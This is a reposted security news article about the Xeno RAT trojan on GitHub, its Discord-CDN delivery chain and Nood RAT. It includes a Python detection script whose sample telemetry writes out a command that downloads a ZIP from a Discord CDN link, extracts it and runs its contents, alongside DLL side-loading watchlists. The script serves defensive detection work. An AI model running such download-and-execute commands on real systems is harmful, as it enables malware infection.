Xeno RAT, a newly emerging trojan on GitHub

admin, 2024-02-28 12:26:00

An "intricately designed" remote access trojan (RAT) called Xeno RAT has been published on GitHub, making it available to other actors at no cost.

Written in C# and compatible with Windows 10 and Windows 11 operating systems, the open-source RAT comes with a "comprehensive set of features for remote system management," according to its developer, who goes by the name moom825.

It includes a SOCKS5 reverse proxy and the ability to record real-time audio, and incorporates a hidden virtual network computing (hVNC) module along the lines of DarkVNC, which gives attackers remote desktop access to an infected computer through a hidden desktop the victim does not see.

"Xeno RAT is developed entirely from scratch, ensuring a unique and tailored approach to remote access tools," the developer states in the project description. Another notable aspect is that it has a builder that enables the creation of bespoke variants of the malware.

It's worth noting that moom825 is also the developer of another C#-based RAT called DiscordRAT 2.0, which threat actors distributed inside a malicious npm package named node-hide-console-windows, as disclosed by ReversingLabs in October 2023.

Cybersecurity firm Cyfirma, in a report published last week, said it observed Xeno RAT being disseminated via the Discord content delivery network (CDN), once again underscoring how a rise in affordable and freely available malware is driving an increase in campaigns utilizing RATs.

"The primary vector in the form of a shortcut file, disguised as a WhatsApp screenshot, acts as a downloader," the company said. "The downloader downloads the ZIP archive from Discord CDN, extracts, and executes the next stage payload."

The multi-stage sequence leverages a technique called DLL side-loading to launch a malicious DLL, while simultaneously taking steps to establish persistence and evade analysis and detection.
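The delivery chain Cyfirma describes (an image-lookalike shortcut, a ZIP fetched from the Discord CDN, a next stage launched through DLL side-loading) maps onto three endpoint telemetry checks. The Python script below is an added example written for this page, not code from Cyfirma, moom825 or the Xeno RAT project: it runs the three checks over a handful of constructed Sysmon-style events (file-create, process-create, image-load) and reports when all three stages appear together. Every path, file name, URL and the watchlist of side-loadable DLL names in it are assumptions for illustration; the article does not name the DLL the real loader abuses.

```python
import re
from dataclasses import dataclass

# Attachment URLs on the Discord CDN, the hosting the report describes for the ZIP stage.
DISCORD_CDN = re.compile(
    r"https?://(?:cdn|media)\.discordapp\.(?:com|net)/attachments/", re.I)
# A shortcut whose name carries an image/document extension before ".lnk".
DOUBLE_EXT_LNK = re.compile(r"\.(?:png|jpe?g|gif|pdf|docx?)\.lnk$", re.I)
# DLL names that should only ever resolve from the system directories. Constructed
# watchlist for illustration; the article does not say which DLL Xeno RAT's loader abuses.
SIDELOAD_DLLS = {"version.dll", "dbghelp.dll", "wininet.dll", "cryptbase.dll", "userenv.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "curl.exe"}


@dataclass
class Event:
    kind: str               # "filecreate", "process" or "imageload" (Sysmon IDs 11, 1, 7)
    image: str              # process that produced the event
    parent_image: str = ""  # process events
    command_line: str = ""  # process events
    target: str = ""        # filecreate: path written
    loaded: str = ""        # imageload: module path


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def _basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def lure_shortcut(e: Event) -> bool:
    """Double-extension .lnk written somewhere a user can write (the WhatsApp-screenshot lure)."""
    return (e.kind == "filecreate"
            and DOUBLE_EXT_LNK.search(e.target) is not None
            and _norm(e.target).startswith(USER_WRITABLE))


def discord_downloader(e: Event) -> bool:
    """Script host spawned by explorer.exe (a double-clicked shortcut) that reaches the Discord CDN."""
    return (e.kind == "process"
            and _basename(e.image) in SCRIPT_HOSTS
            and _basename(e.parent_image) == "explorer.exe"
            and DISCORD_CDN.search(e.command_line) is not None)


def dll_sideload(e: Event) -> bool:
    """A system-DLL name loaded from a user-writable directory rather than System32/SysWOW64."""
    if e.kind != "imageload":
        return False
    path = _norm(e.loaded)
    return (_basename(path) in SIDELOAD_DLLS
            and not path.startswith(SYSTEM_DIRS)
            and path.startswith(USER_WRITABLE))


RULES = (("lure_shortcut", lure_shortcut),
         ("discord_downloader", discord_downloader),
         ("dll_sideload", dll_sideload))


def detect(events):
    """Return (rule, event) for every hit, plus a 'delivery_chain' verdict when all three stages fire."""
    hits = [(name, e) for e in events for name, rule in RULES if rule(e)]
    if {name for name, _ in hits} >= {name for name, _ in RULES}:
        hits.append(("delivery_chain", None))
    return hits


# Constructed sample telemetry mirroring the chain in the report; none of it is real data.
SAMPLE_EVENTS = [
    Event("filecreate", image=r"C:\Windows\explorer.exe",
          target=r"C:\Users\alice\Downloads\WhatsApp Image 2024-02-20.jpg.lnk"),
    Event("process", image=r"C:\Windows\System32\cmd.exe", parent_image=r"C:\Windows\explorer.exe",
          command_line=(r'cmd.exe /c curl -s -o %TEMP%\pkg.zip '
                        r'https://cdn.discordapp.com/attachments/1111/2222/pkg.zip '
                        r'&& tar -xf %TEMP%\pkg.zip -C %TEMP% && %TEMP%\viewer.exe')),
    Event("imageload", image=r"C:\Users\alice\AppData\Local\Temp\viewer.exe",
          loaded=r"C:\Users\alice\AppData\Local\Temp\version.dll"),
    # Benign control: the same DLL name from its legitimate location must not fire.
    Event("imageload", image=r"C:\Program Files\Contoso\contoso.exe",
          loaded=r"C:\Windows\System32\version.dll"),
]

if __name__ == "__main__":
    for name, e in detect(SAMPLE_EVENTS):
        detail = (e.target or e.command_line or e.loaded) if e else "all three stages observed"
        print(name, "->", detail)
```

Running the script prints the three stage hits and the chain verdict for the sample events, and nothing for the benign control. Each rule is deliberately weak on its own (explorer.exe as the parent only covers the double-click case, and any of the side-load DLL names can appear in legitimate software bundles), which is why the chain verdict, not any single rule, is the signal worth alerting on.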

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a Gh0st RAT variant called Nood RAT is being used in attacks targeting Linux systems, allowing adversaries to harvest sensitive information.

"Nood RAT is a backdoor malware that can receive commands from the C&C server to perform malicious activities such as downloading malicious files, stealing systems' internal files, and executing commands," ASEC said.

"Although simple in form, it is equipped with the encryption feature to avoid network packet detection and can receive commands from threat actors to carry out multiple malicious activities."

Originally published on the WeChat official account 知机安全: Xeno RAT, a newly emerging trojan on GitHub

Posted by admin on 2024-02-28 12:26:00. When reposting, please keep the link to this article (CN-SEC中文网; thanks to the original author): Xeno RAT, a newly emerging trojan on GitHub, http://cn-sec.com/archives/2532596.html
